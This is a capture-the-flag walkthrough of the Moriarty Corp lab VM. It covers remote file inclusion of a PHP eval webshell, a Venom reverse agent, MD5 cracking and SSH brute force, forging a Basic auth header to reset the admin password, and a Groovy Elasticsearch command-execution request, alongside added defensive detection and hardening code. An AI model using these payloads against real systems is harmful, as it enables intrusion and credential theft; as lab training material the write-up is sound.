Main knowledge points covered

File inclusion
Intranet penetration
Webshell upload
Weak passwords
Changing permissions via an HTTP header
Elasticsearch CVE
Brute-force cracking

Network topology

After finishing the writeup I also drew the network topology of the target machine.

Preface

The virtual machine software used this time is VirtualBox. It was my first time using it and the configuration took a long time. Because the target machine sits in an internal network environment, some network settings have to be adjusted manually.

With the network configured as above, the IP scan can be run again, and the IP of our target machine can be identified from its MAC address.

Target machine download address:

BoredHackerBlog: Moriarty Corp

Penetration process

Finding the IP

The penetration test is run from a Windows host, and Advanced_IP_Scanner is used to scan the intranet for IPs.

Identify the IP address from its MAC address, then port-scan the IP obtained.

Port scanning

Here the Yujian (御剑) port scanner is used for detection.

Ports 8000 and 9000 look suspicious, so we access them in the browser.

Web penetration

Access port 8000.

This is a page for submitting flags, and it also shows our task progress. First, submit the first flag as the prompt says.

A new prompt is displayed.

With help from the mighty Baidu Translate and Google Translate, the hint becomes clear: start the penetration from port 80 and then submit the flag here. So we now access port 80 again.

Access now works, and our penetration officially begins.

From the URL, a file inclusion vulnerability is suspected. Try reading sensitive data.

After successfully reading /etc/passwd, let's check whether a webshell can be included remotely.

The webshell is first placed on our own server:

<?php eval($_REQUEST['pdsdt']); echo 'Welcome Hacker'; phpinfo(); ?>

Try remote file inclusion.

The remote file is included successfully; use AntSword (蚁剑) to connect to the webshell.
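As an added example (not part of the original writeup), the following Python runs a simple LFI/RFI detector over constructed access-log lines modelled on the two steps above, the /etc/passwd read followed by the remote include from the tester's host. The combined log format, the parameter name page and the timestamps are assumptions, since the page does not show the vulnerable URL.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed combined log format: client, identd, user, [time], "method target proto", status, bytes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Local-inclusion indicators: directory traversal, the file the page read, PHP stream wrappers.
LOCAL = re.compile(r"(^|/)\.\.(/|$)|(^|/)etc/passwd|^php://")
# Remote-inclusion indicator: the parameter value is itself a URL.
REMOTE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def inspect_target(target):
    """Return 'rfi', 'lfi' or None after decoding every query value (twice, to catch double encoding)."""
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(unquote(value))
        if REMOTE.search(value):
            return "rfi"
        if LOCAL.search(value):
            return "lfi"
    return None


def scan_log(lines):
    """Return (client, kind, target, status) for every line that looks like an inclusion attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        kind = inspect_target(m["target"]) if m else None
        if kind:
            hits.append((m["ip"], kind, m["target"], m["status"]))
    return hits


# Constructed sample lines modelled on the page's steps; the parameter name 'page' is assumed
# and 192.168.1.101 is the tester's host named later on the page.
SAMPLE_LOG = [
    '192.168.1.101 - - [10/Jun/2020:10:00:00 +0000] "GET /?page=home HTTP/1.1" 200 512',
    '192.168.1.101 - - [10/Jun/2020:10:00:05 +0000] "GET /?page=../../../../etc/passwd HTTP/1.1" 200 1830',
    '192.168.1.101 - - [10/Jun/2020:10:00:09 +0000] "GET /?page=http://192.168.1.101/shell.txt HTTP/1.1" 200 60211',
    '10.0.0.7 - - [10/Jun/2020:10:01:00 +0000] "GET /?page=contact HTTP/1.1" 200 480',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```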


Look for the flag and for information about the next step.

The flag file is found in the root directory.

Submit it on the port 8000 page; after submission we get another hint.

The next step is to forward traffic and penetrate the intranet.

Intranet penetration – setting up the proxy

Set up the intranet proxy. There are many ways to do this; MSF could also be used for the whole test, but for convenience Venom and Proxifier are used here to forward traffic.

Upload the agent node first.

Start the admin listener on Windows:

admin.exe -lport 9999

On the agent side, change the program's permission to 777 and run:

/agent_linux_x64 -rhost 192.168.1.101 -rport 9999

The connection is received successfully.

Set up the SOCKS5 proxy.

Configure Proxifier.

Try accessing the target on the intranet.

Access succeeds.

Next comes the actual intranet lateral movement.

First, find the live hosts on the intranet by scanning the network segment given in the hint.

A web page is found on 172.17.0.4.

It turns out to be a file upload point that requires a password before an upload is accepted. First capture the request with Burp and run a common weak-password list against it.

With the request captured, fuzz the password.

When the weak password "password" is tried, the upload succeeds…

Following the response page, try visiting our webshell.

Code execution works and the upload succeeded; connect with AntSword.

Find the flag file again and submit it on the port 8000 page.

Again, the page gives a hint.

We are given candidate usernames and hashed passwords; crack the hashes and then try SSH login.

Usernames:
root
toor
admin
mcorp
moriarty

The password hashes are looked up with cmd5:

Hash value                        Plaintext
63a9f0ea7bb98050796b649e85481845 root
7b24afc8bc80e548d66c4e7ff72171c5 toor
5f4dcc3b5aa765d61d8327deb882cf99 password
21232f297a57a5a743894a0e4a801fc3 admin
084e0343a0486ff05530df6c705c8bb4 guest
697c6cc76fdbde5baccb7b3400391e30 MORIARTY
8839cfc8a0f24eb155ae3f7f205f5cbc MCORP
35ac704fe1cc7807c914af478f20fd35 mcorp
b27a803ed346fbbf6d2e2eb88df1c51b weapons
08552d48aa6d6d9c05dd67f1b4ba8747 moriarty
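As an added example (not part of the original writeup), the following Python shows why these unsalted MD5 hashes fell to a short wordlist instantly, and contrasts that with salted, iterated PBKDF2 storage, where no lookup table can be precomputed and every guess costs a full key derivation. The wordlist and the PBKDF2 parameters are constructed for the demo.

```python
import hashlib
import hmac
import os

# Constructed wordlist: the usernames and recovered plaintexts quoted on the page.
WORDLIST = ["root", "toor", "admin", "mcorp", "moriarty", "password",
            "guest", "MORIARTY", "MCORP", "weapons"]


def md5_lookup_table(words):
    """Unsalted MD5 involves no secret and no salt, so the digest of every
    candidate word is computed once and then answers any hash instantly."""
    return {hashlib.md5(w.encode()).hexdigest(): w for w in words}


def crack_md5(digest, words=WORDLIST):
    """Return the plaintext behind an unsalted MD5 digest if it is in the wordlist."""
    return md5_lookup_table(words).get(digest.strip().lower())


# Hardened storage (assumed parameters): a random 16-byte salt per record and a
# deliberately slow key derivation, so each guess costs a full PBKDF2 run and
# no table can be shared between users or precomputed in advance.
ITERATIONS = 200_000


def hash_password(password):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def verify_password(password, stored):
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # Two of the digests quoted on the page resolve immediately against the wordlist.
    for digest in ("63a9f0ea7bb98050796b649e85481845", "5f4dcc3b5aa765d61d8327deb882cf99"):
        print(digest, "->", crack_md5(digest))
    # The same password stored twice yields two different records.
    record = hash_password("weapons")
    print(verify_password("weapons", record), hash_password("weapons") != record)
```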

Scan the intranet again for hosts with port 22 open.

172.17.0.5 is found with SSH open. A dictionary was built from the information obtained and an SSH brute-force tool was run against it (in the end Hydra succeeded).

The password obtained is:

root / weapons

Log in with Xshell.

The flag is obtained again.

Submitting it on port 8000 updates the hint again.

There is also a chat program on the intranet, and its port is not 80, so let's scan the specified ports. An account is also given, and we need to obtain the admin user's chat records.

Port 8000 on 172.17.0.6 is open.

We are prompted to log in; log in with the account from the hint.

Here are the credentials our agent has obtained from another source:
username: buyer13
password: arms13

Login succeeds.

The site has two functions: view chat history and change password. Visit the change-password page and capture the request to see whether another user's password can be reset.

Change the user name to admin.

Looking over the captured request, a problem is found in the header:

Authorization: Basic YnV5ZXIxMzphcm1zMTM=

Base64-decode it.

Now that we know how the username and password are carried, let's forge the administrator's identity and change the password to admin:

Authorization: Basic YWRtaW46YWRtaW4=

Go back to the web page and log in again, or keep using the modified header.

Successfully logged in as admin, and the chats can be viewed.
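The page does not show the chat application's server code, so the following Python models the flaw as an assumed design: the change-password handler takes the account name from the Basic Authorization header and never verifies the password half, which is what lets a forged admin:admin header reset admin's password. This is an added example, not the target's code; the user store, the KDF parameters and admin's real password are constructed.

```python
import base64
import binascii
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed KDF cost for the demo store

def make_record(password):
    """Salted PBKDF2 record; the real app's storage is not shown on the page."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

# Constructed user store: buyer13/arms13 is the account the page was given; admin's real
# password is an assumed value the client does not know.
USERS = {
    "buyer13": make_record("arms13"),
    "admin": make_record("ASSUMED-real-admin-password"),
}

def parse_basic(header):
    """Return (username, password) from 'Authorization: Basic ...', or None if malformed."""
    scheme, _, blob = header.strip().partition(" ")
    try:
        decoded = base64.b64decode(blob, validate=True).decode() if scheme.lower() == "basic" else ""
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None

def credentials_valid(user, password):
    rec = USERS.get(user)
    if rec is None:
        return False
    return hmac.compare_digest(hashlib.pbkdf2_hmac("sha256", password.encode(), rec[0], ITERATIONS), rec[1])

def change_password_vulnerable(auth_header, new_password):
    """Modelled flaw: the account comes from the header's username; the password half is never checked."""
    creds = parse_basic(auth_header)
    if creds is None or creds[0] not in USERS:
        return False
    USERS[creds[0]] = make_record(new_password)
    return True

def change_password_fixed(auth_header, new_password):
    """Verify the presented credentials before touching the account they name."""
    creds = parse_basic(auth_header)
    if creds is None or not credentials_valid(*creds):
        return False
    USERS[creds[0]] = make_record(new_password)
    return True
```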


Get the flag again and submit it.

After looking at it for a while: isn't this Elasticsearch? It is exactly what I've been using on a recent project, what a coincidence. Scan the network segment for port 9200.

Open the page: it is the standard ES search page.

Try ES's arbitrary code execution vulnerability.

Construct a request to create a document:

POST /mitian/mitian6/ HTTP/1.1
Host: 172.17.0.7:9200
Content-Length: 19
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Origin: http://172.17.0.7:9200
Content-Type: text/plain
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.0.7:9200/mitian/mitian6/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"name": "PDSDT "}

Then construct the search request:

POST /_search?pretty HTTP/1.1
Host: 172.17.0.7:9200
Content-Length: 156
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Origin: http://172.17.0.7:9200
Content-Type: text/plain
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.17.0.7:9200/mitian/mitian6/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").getText()"}}}
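As an added example (not from the writeup), the following Python inspects captured Elasticsearch request bodies for inline scripts and flags the reflection idiom used above, so that such an attempt shows up when proxy or access logs are reviewed. The sample requests are constructed from the page's two bodies plus benign ones, and the indicator list is an assumption.

```python
import json
import re

# Assumed indicators of a script escaping the sandbox into the JVM.
SUSPICIOUS = re.compile(r"class\.forName|Runtime|ProcessBuilder|\.exec\(|getText\(\)")


def _iter_scripts(node):
    """Yield (lang, source) for every inline script anywhere in a request body.
    Covers the 1.x form {"lang": ..., "script": "..."} and the later
    {"script": {"lang": ..., "inline"/"source": "..."}} form."""
    if isinstance(node, dict):
        script = node.get("script")
        if isinstance(script, str):
            yield node.get("lang", "default"), script
        elif isinstance(script, dict):
            src = script.get("inline", script.get("source"))
            if isinstance(src, str):
                yield script.get("lang", "default"), src
        for value in node.values():
            yield from _iter_scripts(value)
    elif isinstance(node, list):
        for value in node:
            yield from _iter_scripts(value)


def classify(body):
    """'rce' if an inline script reaches for the JVM, 'dynamic-script' for any
    other inline script, 'ok' otherwise (non-JSON bodies are not inspected)."""
    try:
        doc = json.loads(body) if body.strip() else {}
    except json.JSONDecodeError:
        return "ok"
    scripts = list(_iter_scripts(doc))
    if not scripts:
        return "ok"
    if any(SUSPICIOUS.search(src) for _, src in scripts):
        return "rce"
    return "dynamic-script"


# Constructed samples: the page's search body, a normal query, the page's index write, a harmless script.
SAMPLES = [
    ("/_search?pretty", '{"size":1,"script_fields":{"lupin":{"lang":"groovy","script":'
                        '"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"ls\\").getText()"}}}'),
    ("/_search", '{"query":{"match":{"name":"PDSDT"}}}'),
    ("/mitian/mitian6/", '{"name": "PDSDT "}'),
    ("/_search", '{"script_fields":{"twice":{"lang":"groovy","script":"doc[\'n\'].value * 2"}}}'),
]


def scan(samples=SAMPLES):
    """Return (path, verdict) for each captured (path, body) pair."""
    return [(path, classify(body)) for path, body in samples]
```

For the 1.x Groovy engine the upstream mitigation was to disable dynamic Groovy with script.groovy.sandbox.enabled: false in elasticsearch.yml (or to upgrade); the detector above is a compensating control, not a substitute.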


The command executes successfully; read the flag.

The flag file is obtained and submitted.

The page shows the mission completed and our IP added to the blacklist. Pretty awesome.

Conclusion

This target machine took most of my time, mainly on the network configuration at the very beginning. None of the individual intranet machines was very hard; what matters is using the right tools through the forwarded traffic to scan ports and brute-force services. Overall the gains were high, even though it differs quite a bit from a real environment. Since I have recently been using ES products, I also took this opportunity to strengthen my knowledge of ES-related vulnerabilities.
